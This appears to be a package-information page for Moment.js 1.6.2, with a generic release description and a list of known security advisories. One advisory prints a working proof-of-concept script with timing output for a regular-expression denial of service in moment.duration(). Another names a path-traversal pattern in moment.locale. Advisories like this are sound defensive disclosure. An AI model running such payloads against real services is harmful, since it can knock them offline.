Moment.js version 1.6.2, released on May 4th, 2012, followed closely on the heels of version 1.6.1, which was released just a week prior on April 26th, 2012. While the core description of Moment.js remains consistent – a JavaScript date library designed for creating, manipulating, and formatting dates without modifying the native Date object – the quick succession of releases hints at potential bug fixes, performance improvements, or minor feature enhancements.
Both versions share identical dependency configurations, relying on jshint for code quality, nodeunit for testing, and uglify-js for minification during development. This indicates a stable development workflow focused on maintaining code standards and optimizing for production. Developers familiar with the library will find a consistent API and behavior between these versions. The shared author information and repository details confirm continuity in maintainership and source control.
For developers considering using Moment.js, these versions offer a solid foundation for date handling in JavaScript. The library's strength lies in its ease of use and comprehensive formatting options, simplifying common date-related tasks. While the specific changes between 1.6.1 and 1.6.2 aren't explicitly detailed, the proximity of the releases suggests an incremental improvement to an already robust and popular date manipulation library. Developers should consult the official Moment.js changelog (if available) for a more granular understanding of the differences. However, either version offers a reliable choice for projects requiring flexible and powerful date management. Ultimately, users should opt for the latest stable version available at the time of their project's implementation.
All vulnerabilities related to version 1.6.2 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
```javascript
var moment = require('moment');

// Build a string of len+1 copies of chr (the loop runs from 0 through len inclusive).
// Note: `i` is never declared, so genstr and the loop below share one global
// counter; that is why COUNT in the output advances by 10001 rather than 10000.
var genstr = function (len, chr) {
    var result = "";
    for (i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// Feed progressively longer '-111...1' strings to moment.duration() and time each call.
for (i = 20000; i <= 10000000; i = i + 10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1');
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str);
    var end = process.hrtime(start); // [seconds, nanoseconds]
    console.log(end);
}
```
```text
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. fr, is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.